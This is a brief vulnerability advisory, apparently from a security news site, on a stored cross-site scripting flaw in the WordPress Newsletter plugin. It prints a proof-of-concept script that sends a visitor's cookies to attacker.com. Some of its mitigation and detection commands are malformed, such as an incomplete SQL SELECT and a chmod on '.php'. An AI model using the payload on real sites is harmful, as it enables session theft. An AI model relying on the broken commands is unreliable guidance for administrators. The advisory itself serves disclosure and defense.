WordPress, Stored Cross-Site Scripting, CVE-2025-3584 (High)

Listen to this Post

How CVE-2025-3584 Works

The Newsletter plugin (pre-8.8.2) fails to sanitize Subscription settings, allowing admins to inject malicious scripts stored in the database. Even with `unfiltered_html` disabled (e.g., WordPress Multisite), the payload executes when rendered in admin panels or frontend subscription forms. Attackers leverage this to hijack sessions, deface pages, or escalate privileges via crafted JavaScript in settings like email templates or subscription fields.

DailyCVE Form:

Platform: WordPress
Version: <8.8.2
Vulnerability: Stored XSS
Severity: High
Date: 2025-06-05

Prediction: Patch by 2025-06-20

What Undercode Say:

Analytics:

  • Exploitability: 3.8/5 (Admin req.)
  • Patch Gap: ~15 days expected
  • Attack Surface: /wp-admin/admin.php?page=newsletter_subscription

Commands:

1. Check plugin version:

wp plugin get newsletter --field=version

2. Temporary mitigation:

chmod 640 wp-content/plugins/newsletter/.php

Exploit PoC (Sanitized):

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

Inject via Subscription > Template settings.

Protection:

1. Immediate update:

wp plugin update newsletter

2. .htaccess hardening:

<FilesMatch "newsletter\.php">
Require all denied
</FilesMatch>

3. WAF rule:

location ~ /wp-content/plugins/newsletter/ {
deny all;
}

Detection:

SELECT FROM wp_options WHERE option_name LIKE 'newsletter%' AND option_value LIKE '%<script%';

Patch Diff (Expected):

- echo $setting;
+ echo esc_html($setting);

No further commentary.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top